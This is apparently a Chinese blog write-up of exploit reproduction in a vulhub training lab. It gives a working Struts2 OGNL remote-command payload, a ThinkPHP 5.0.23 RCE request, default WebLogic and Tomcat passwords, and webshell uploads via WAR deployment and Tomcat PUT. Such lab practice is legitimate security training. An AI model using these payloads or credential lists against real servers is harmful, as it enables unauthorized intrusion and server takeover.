vulhub靶场漏洞复现

最新推荐文章于 2024-04-15 20:29:05 发布
最新推荐文章于 2024-04-15 20:29:05 发布
阅读量304 收藏 1
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60660067/article/details/126278397
版权
  • Struts2远程命令执行漏洞复现

访问http://192.168.56.143:8081/页面,Burpsuite抓取数据包,插入如下payload

Content-Type:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}.multipart/form-data

Content-Length: 2

其中whoami为执行的命令,可进行更改

读取Key.txt

 

  • thinkphp-5.0.23-rce远程命令执行漏洞复现

访问http://192.168.56.143:8082/页面,burpsuite抓取数据包

更改请求方式为post

url更改为:/index.php?s=captcha

提交数据参数为:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

其中pwd为所要执行的命令

  • weblogic弱口令漏洞复现

访问http://192.168.56.143:8083/console/login/LoginForm.jsp

管理后台登录页面

使用weblogic常用弱口令进行登录尝试

weblogic/Oracle@123

system/password

weblogic/weblogic

admin/security

joe/password

wlcsystem/wlcsystem

成功使用weblogic/Oracle@123登录管理后台

点击左侧的部署,可见一个应用列表:

 

点击安装,选择上载文件,上传war包,上传成功之后,war包自动解压部署。

shell.jsp添加压缩文件为shell.zip,更改扩展名为.war

上传war包,持续下一步,点击完成,保存

 

 

 

 哥斯拉连接上传的shell.jsp

http://192.168.56.143:8083/shell/shell.jsp

  • Tomcat PUT方法任意写文件漏洞复现

访问http://192.168.56.143:8084/页面,burpsuite抓取数据包

更改请求方式为PUT,url为/webshell.jsp/,提交数据为木马文件内容

 

哥斯拉连接webshell.jsp

http://192.168.56.143:8084/webshell.jsp

  • Tomcat弱口令漏洞复现

访问http://192.168.56.143:8085/页面,点击Manager APP,跳转后台登录

 

使用tomcat/tomcat弱口令进行登录

 

上传文件处,上传war包,上传成功之后,部署war包,点击Reload,running值显示为ture。

 

 

哥斯拉连接shell.jsp

http://192.168.56.143:8085/shell/shell.jsp

 

m0_60660067
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulhub靶场-tomcat漏洞
m0_62008601的博客
07-23 1321
tomcat漏洞合集
vulhub漏洞十_DNS
weixin_44193247的博客
01-17 1009
vulhub漏洞练习篇
Vulhub漏洞环境搭建流程,网络安全社招面经分享
最新发布
04-15 339
(列出运行中的容器,此时靶机在ID为:3be91cb2f1f5 的容器中运行,服务端口号为8161)(1)在已进入的编号漏洞文件夹下,输入docker命令,开启容器,靶机环境。(2)浏览器访问靶机(虚拟机IP地址+端口号),至此,漏洞环境已经成功搭建。1.退出靶机回到虚拟机,不关闭容器(不删除环境)2.退出靶机回到虚拟机,并且关闭容器,删除环境。(1)终端docker命令进入靶机。(2)docker命令回到靶机中。(1)命令exit退出靶机。(1)命令exit退出靶机。
vulhub靶场-weblogic漏洞
m0_62008601的博客
07-18 1759
vulhub-weblogic漏洞集 weak-password CVE-2018-2894 SSRF(CVE-2014-4210) CVE-2020-14882&14883 CVE-2018-2628 CVE-2017-10271
vulhub漏洞—weblogic RCE
weixin_45808483的博客
12-02 1080
一开始只知道一个IP 212.129.248.63 使用nmap扫描开放的端口 经过尝试我们发 7001 端口是我们的要打的靶机漏洞 使用 Xary 扫描 xray_windows_amd64.exe webscan --url http://212.129.248.63:7001/ --html-output 1203.html 漏洞利用 ...
vulhub靶场sql注入漏洞
赵花花08042的博客
12-13 3171
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234) https://github.com/vulhub/vulhub/blob/master/django/CVE-2019-14234/README.zh-cn.md https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483996&idx=1&sn=4254dc0a54003cccb29dd42935f8ccea.
vulhub漏洞测试靶场
08-16
Vulhub是一个专门为安全研究人员和渗透测试人员设计的漏洞测试靶场平台,它提供了一系列预配置的漏洞环境,用于学习和实践网络安全技能。这个平台基于Docker容器技术,使得每个漏洞环境可以独立运行,便于管理和...
vulhub靶场文件(不用积分)
05-18
使用Vulhub一键搭建漏洞测试靶场,下载日期2020/05/18。 kali下安装命令 apt-get install docker.io apt-get install docker-compose cd cd /vulhub/flask/ssti service docker start docker-compose up -d
vulhub-compose.zip
01-16
同时,支持直接安装洞态IAST(原灵芝IAST)到vulhub靶场,用于漏洞漏洞挖掘。 靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色...
Thiinkphp 5.0.23-rce 漏洞vulhub
MDSEC的博客
08-22 290
形成原因是因为其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。这样thinkphp 5.0.23-rce漏洞完成了。2>.bp抓包修改post请求,传递参数。响应包状态码为500,但是可以访问页面。访问8080端口的本机地址。尝试写入phpinfo。
REC代码及命令执行代码全解
qq_45750691的博客
08-17 1487
第30天—REC代码及命令执行代码全解 ​ 在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。 代码执行 代码执行的危害 执行脚本代码 脚本能干嘛 它就能干嘛 案例(PHP环境) 假设对方存在这样的一个代码执行漏洞 就可以用代码去攻击它 通过evel去上传一个webshell,然后去控制它 <?
Vulhub靶场之struts2漏洞
weixin_66717977的博客
03-21 1283
struts2漏洞中属s2系列杀伤力最大,本文基于vulhub靶场,将介绍并strut2漏洞
Vulhub靶场之Tomcat漏洞
weixin_66717977的博客
06-30 424
tomcat漏洞
XCTF篇:Web (高手进阶区) 3 ThinkPHP5.0.20远程命令执行漏洞
小明师傅博客
06-21 1230
3.php_rce 感觉是让我找ThinkPHP V5的漏洞?? 但我连ThinkPHP V5是什么都不知道== 对我这小白一点也不友好 搜索发框架和cms的区别 框架就是提供一个快速bai敏捷开发的平台,里面一些常du用的功zhi能,都封装好,然后你要按照框架的语法和文件结dao构来进行网站的建设,就好比是搭建了一个房子外面的框架都设计好,你需要做的是修改里面的东西. 而cms是将整个房间,不仅框架搭建好了.里面的各个房间也给你布置好,可以不经过任何加工直接可以入住. 两者的优缺点是: 框架相对比较灵
vulhub-spring漏洞
qq_51922767的博客
09-14 2556
vulhub-spring漏洞
vulhub漏洞77_zabbix
weixin_44193247的博客
02-14 1534
vulhub漏洞练习篇
Vulhub漏洞
weixin_45995579的博客
09-30 1702
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
log4j漏洞vulhub靶场
08-14
要在 Vulhub 靶场 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值